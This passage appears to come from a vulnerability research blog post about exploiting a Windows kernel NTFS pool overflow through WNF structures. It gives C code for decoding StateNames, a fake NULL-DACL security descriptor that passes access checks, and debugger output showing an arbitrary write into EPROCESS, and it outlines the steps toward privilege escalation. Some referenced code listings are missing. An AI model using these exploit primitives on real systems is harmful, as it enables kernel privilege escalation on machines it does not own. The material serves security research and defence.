Version     = InternalName & 0xf
LifeTime    = (InternalName >> 4) & 0x3
DataScope   = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence    = InternalName >> 0xb
```
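Putting the XOR and the bitwise operations together, a small C sketch can convert an external StateName into its internal fields and back. The type and function names are hypothetical; the field layout follows the _WNF_STATE_NAME_STRUCT bitfields in the dx output above, and the check uses the example external value 0x41c64e6da36d9945 from the text, which should decode to the internal value 0x00d19931 seen in the dc output.

```c
#include <assert.h>
#include <stdint.h>

/* External StateName = internal StateName XOR this constant. */
#define WNF_STATE_NAME_XOR 0x41C64E6DA3BC0074ULL

typedef struct {
    unsigned version;        /* bits 0-3   */
    unsigned name_lifetime;  /* bits 4-5   */
    unsigned data_scope;     /* bits 6-9   */
    unsigned permanent;      /* bit 10     */
    uint64_t sequence;       /* bits 11-63 */
} wnf_state_name_t;

static wnf_state_name_t wnf_decode_external(uint64_t external) {
    uint64_t internal = external ^ WNF_STATE_NAME_XOR;
    wnf_state_name_t n;
    n.version       = (unsigned)(internal & 0xf);
    n.name_lifetime = (unsigned)((internal >> 4) & 0x3);
    n.data_scope    = (unsigned)((internal >> 6) & 0xf);
    n.permanent     = (unsigned)((internal >> 10) & 0x1);
    n.sequence      = internal >> 11;
    return n;
}

/* Inverse: pack the fields and convert back to the external form. */
static uint64_t wnf_encode_external(wnf_state_name_t n) {
    assert(n.version <= 0xf && n.name_lifetime <= 0x3);
    assert(n.data_scope <= 0xf && n.permanent <= 0x1);
    uint64_t internal = (uint64_t)n.version
                      | ((uint64_t)n.name_lifetime << 4)
                      | ((uint64_t)n.data_scope << 6)
                      | ((uint64_t)n.permanent << 10)
                      | (n.sequence << 11);
    return internal ^ WNF_STATE_NAME_XOR;
}

/* The example from the text and the dx/dc output above. */
static void check_example_name(void) {
    const uint64_t external = 0x41c64e6da36d9945ULL;
    wnf_state_name_t n = wnf_decode_external(external);
    assert((external ^ WNF_STATE_NAME_XOR) == 0x00d19931ULL);
    assert(n.version == 1 && n.name_lifetime == 3 && n.data_scope == 4);
    assert(n.permanent == 0 && n.sequence == 0x1a33);
    assert(wnf_encode_external(n) == external);   /* round trip */
}
```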

The key thing to realise here is that whilst Version, LifeTime and DataScope are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see below, depending on the DataScope, either the current server Silo Globals or the Server Silo Globals are offset into to obtain v10, which is then used as the Sequence and incremented by 1 each time.

Then, in order to look up a name instance, the following code path is taken:

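In this code, i[3] is actually the StateName of a _WNF_NAME_INSTANCE structure: i points at the instance's _RTL_BALANCED_NODE (its TreeLinks member, part of the tree rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure), and StateName lies just past that node, at TreeLinks + 0x18.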

Each _WNF_NAME_INSTANCE is joined to the others through its TreeLinks member. The tree traversal code above therefore walks the AVL tree to find the correct StateName.
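The i[3] indexing and the tree walk can be modelled in user mode. The C sketch below mirrors only the first few fields of _WNF_NAME_INSTANCE using the offsets from the dt output (so it assumes a 64-bit target), checks that StateName sits three 64-bit slots past TreeLinks, and performs a plain binary-search-tree lookup. The struct and function names are hypothetical, and the smaller-goes-left ordering is an assumption, since the comparison direction is not visible in the text.

```c
#include <assert.h>   /* static_assert */
#include <stddef.h>
#include <stdint.h>

typedef struct balanced_node {
    struct balanced_node *left;    /* Children[0] */
    struct balanced_node *right;   /* Children[1] */
    uintptr_t parent_value;        /* parent pointer plus balance bits */
} balanced_node_t;

/* Hypothetical mirror of the start of nt!_WNF_NAME_INSTANCE. */
typedef struct {
    uint64_t header;               /* +0x000 _WNF_NODE_HEADER (+ padding) */
    uint64_t run_ref;              /* +0x008 _EX_RUNDOWN_REF */
    balanced_node_t tree_links;    /* +0x010 */
    uint64_t state_name;           /* +0x028 internal StateName */
} name_instance_t;

static_assert(offsetof(name_instance_t, state_name) == 0x28, "matches dt output");
static_assert(offsetof(name_instance_t, state_name) - offsetof(name_instance_t, tree_links)
              == 3 * sizeof(uint64_t), "i[3] is StateName when i points at TreeLinks");

static name_instance_t *lookup_name(balanced_node_t *node, uint64_t internal_name) {
    while (node != NULL) {
        /* Step back from the embedded TreeLinks to the enclosing instance. */
        name_instance_t *inst =
            (name_instance_t *)((char *)node - offsetof(name_instance_t, tree_links));
        if (internal_name == inst->state_name)
            return inst;
        node = (internal_name < inst->state_name) ? node->left : node->right;
    }
    return NULL;
}
```

Only the lookup is modelled; the rebalancing the kernel performs on insertion and removal is ignored here.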

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNames of the objects which have been heap sprayed, you don't necessarily know which of the objects will be adjacent to the NTFS chunk being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to which the _WNF_NAME_INSTANCE structure's StateName should be set.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers; the main caveat is that care needs to be taken to avoid triggering the safe unlinking protection.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due to the security descriptor.

Initially I set this to the address of a security descriptor within userland, the one which was used in NtCreateWnfStateName.

Comparing an unmodified security descriptor within kernel space with the one in userspace showed that they were different.

Kernel space:

```
1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0) : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision : 0x1 [Type: unsigned char]
    [+0x001] Sbz1 : 0x0 [Type: unsigned char]
    [+0x002] Control : 0x800c [Type: unsigned short]
    [+0x008] Owner : 0x0 [Type: void *]
    [+0x010] Group : 0x28000200000014 [Type: void *]
    [+0x018] Sacl : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl : 0x101001f0013 [Type: _ACL *]
```

After repointing the security descriptor to the userland structure:

```
1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0) : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision : 0x1 [Type: unsigned char]
    [+0x001] Sbz1 : 0x0 [Type: unsigned char]
    [+0x002] Control : 0xc [Type: unsigned short]
    [+0x008] Owner : 0x0 [Type: void *]
    [+0x010] Group : 0x0 [Type: void *]
    [+0x018] Sacl : 0x0 [Type: _ACL *]
    [+0x020] Dacl : 0x23ee3ab4350 [Type: _ACL *]
```

I then attempted to give the fake security descriptor the same values. This didn't work as expected, and NtUpdateWnfStateData was still returning permission denied (-1073741790, i.e. 0xC0000022, STATUS_ACCESS_DENIED).

Ok then! Let's just make the DACL NULL, so that the Everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

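```c
#include <windows.h>
#include <stdlib.h>

// Fake security descriptor that passed the checks in ExpWnfCheckCallerAccess
SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
if (sd != NULL) {
    sd->Revision = 0x1;
    sd->Sbz1 = 0;
    sd->Control = 0x800c;   // SE_SELF_RELATIVE | SE_DACL_DEFAULTED | SE_DACL_PRESENT
    sd->Owner = 0;
    sd->Group = (PSID)0;
    sd->Sacl = (PACL)0;
    sd->Dacl = (PACL)0;     // NULL DACL, so Everyone has full control
}
```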
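One plausible reading of the two dumps above (an interpretation, not something the debugger states) is that the Control values differ in the SE_SELF_RELATIVE bit (0x8000). In a self-relative descriptor, Owner, Group, Sacl and Dacl are 32-bit offsets rather than pointers, which would explain why dx, using the pointer-based _SECURITY_DESCRIPTOR layout, shows odd-looking values for the kernel copy. The C sketch below decodes the relevant Control bits; the constants carry the same values as the SDK's SE_* bits but are named SD_* here (a hypothetical naming) so the sketch builds without Windows headers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Same values as the SECURITY_DESCRIPTOR_CONTROL bits in winnt.h. */
#define SD_DACL_PRESENT   0x0004u
#define SD_DACL_DEFAULTED 0x0008u
#define SD_SELF_RELATIVE  0x8000u

static bool sd_self_relative(uint16_t control)  { return (control & SD_SELF_RELATIVE) != 0; }
static bool sd_dacl_present(uint16_t control)   { return (control & SD_DACL_PRESENT) != 0; }
static bool sd_dacl_defaulted(uint16_t control) { return (control & SD_DACL_DEFAULTED) != 0; }

static void check_dumped_controls(void) {
    /* Kernel copy and the working fake descriptor: 0x800c. */
    assert(sd_self_relative(0x800c) && sd_dacl_present(0x800c) && sd_dacl_defaulted(0x800c));
    /* Userland descriptor: 0xc, i.e. no SE_SELF_RELATIVE. */
    assert(!sd_self_relative(0xc) && sd_dacl_present(0xc));
}
```

With SE_SELF_RELATIVE set and every offset left at 0 in the working fake descriptor, the DACL is marked present but has no contents, which is consistent with the NULL DACL approach described above.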

EPROCESS Corruption

Initially, when testing out the arbitrary write, I was expecting a kernel crash near the memcpy location when I set the StateData pointer to 0x6161616161616161. However, in practice ExpWnfWriteStateData was found to execute in a worker thread. When an access violation occurs, it is caught and the NT status -1073741819 (STATUS_ACCESS_VIOLATION) is propagated back to userland. This made initial debugging more challenging, as the code around that function was a very hot path and using conditional breakpoints on it brought the program to a standstill.
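The negative decimal statuses quoted here (and the -1073741790 seen earlier) are NTSTATUS values printed as signed 32-bit integers. The small C sketch below, with hypothetical function names, converts them to the usual hexadecimal form and extracts the severity field from the top two bits, where 3 means error.

```c
#include <assert.h>
#include <stdint.h>

/* Reinterpret a signed NTSTATUS as its 32-bit hexadecimal form. */
static uint32_t ntstatus_to_hex(int32_t status) { return (uint32_t)status; }

/* Severity is bits 30-31: 0 success, 1 informational, 2 warning, 3 error. */
static unsigned ntstatus_severity(int32_t status) { return (unsigned)((uint32_t)status >> 30); }

static void check_statuses(void) {
    assert(ntstatus_to_hex(-1073741819) == 0xC0000005u);  /* STATUS_ACCESS_VIOLATION */
    assert(ntstatus_to_hex(-1073741790) == 0xC0000022u);  /* STATUS_ACCESS_DENIED */
    assert(ntstatus_severity(-1073741819) == 3);          /* error */
}
```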

Anyhow, after achieving an arbitrary write, an attacker will typically leverage it either to perform a data-only privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak, we continue our research down this path.

To recap, the following conditions needed to be met:

1) The corrupted internal StateName matches the correct internal StateName, so that the instance can be found when the corresponding external StateName is queried.

2) The security descriptor passes the checks in ExpWnfCheckCallerAccess.

3) The values at the DataSize and AllocatedSize offsets are appropriate for the target memory area.

In summary, after the overflow has occurred we have the following memory layout, with the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

```
PROCESS ffff8881dc84e0c0
    SessionId: 1 Cid: 13fc Peb: c2bb940000 ParentCid: 1184
    DirBase: 4444444444444444 ObjectTable: ffffc7843a65c500 HandleCount: 39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1 Cid: 073c Peb: f143966000 ParentCid: 13fc
    DirBase: 135d92000 ObjectTable: ffffc7843a65ba40 HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0 Cid: 0448 Peb: 825b82f000 ParentCid: 028c
    DirBase: 37daf000 ObjectTable: ffffc7843ec49100 HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header : _WNF_NODE_HEADER
   +0x004 AllocatedSize : 0xffffd68c
   +0x008 DataSize : 0x100
   +0x00c ChangeStamp : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0 00000003 00000000 dc84e0c8 ffff8881 ................
ffff8881`dc84e0d0 00000100 41414142 44444444 44444444 ....BAAADDDDDDDD
ffff8881`dc84e0e0 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e100 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e110 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e120 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e130 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e140 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e150 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e160 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e170 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e180 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e190 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0 44444444 44444444 44444444 44444444 DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0 44444444 44444444 00000000 00000000 DDDDDDDD........
ffff8881`dc84e1e0 00000000 00000000 00000000 00000000 ................
ffff8881`dc84e1f0 00000000 00000000 00000000 00000000 ................
```

As you can see, EPROCESS+0x8 has been corrupted with attacker-controlled data.

At this point typical approaches would be to either:

1) Target the PreviousMode member of a KTHREAD structure

2) Target the EPROCESS token

These approaches, along with their pros and cons, have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary, we have described the vulnerability in more detail and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean-up and continuation.